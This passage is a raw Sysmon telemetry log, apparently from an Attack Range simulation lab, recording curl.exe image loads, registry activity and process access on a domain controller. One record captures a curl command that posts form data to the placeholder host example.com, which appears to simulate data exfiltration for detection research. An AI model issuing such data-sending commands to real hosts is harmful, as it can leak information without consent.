734700x800000000000000055295387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.503{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 734700x800000000000000055295354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 534500x800000000000000055295342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.553{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exe 734700x800000000000000055295316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000055295313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 734700x800000000000000055295312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.504{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 12241200x800000000000000055295309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055295308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055295307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055295306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055295305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055295304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055295303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000055295302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000055295301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000055295300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055295299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055295298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.484{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055295297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055295296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055295295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055295294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055295293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055295292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055295291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055295290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055295289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055295288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055295287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055295286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055295285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055295284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055295283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-92C8-616D-4F11-01000000F101}53165996C:\Windows\system32\conhost.exe{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055295282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055295281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000055295278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 25542500x800000000000000055295277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000055295276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055295275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.469{8B6011A9-92C8-616D-4E11-01000000F101}68126400C:\Windows\system32\cmd.exe{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055295274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:26:47.360{8B6011A9-E4B7-618B-8EA5-04000000F101}8852C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.execurl -d name=admin -d shoesize=12 http://example.com/c:\Temp\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-92C8-616D-4E11-01000000F101}6812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 534500x800000000000000055296111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.802{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exe 734700x800000000000000055296110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.797{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000055296109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055296108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055296107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055296106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055296105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055296104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055296103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055296102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055296101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055296100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055296099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055296098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055296097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055296096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055296095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.780{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055296094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT 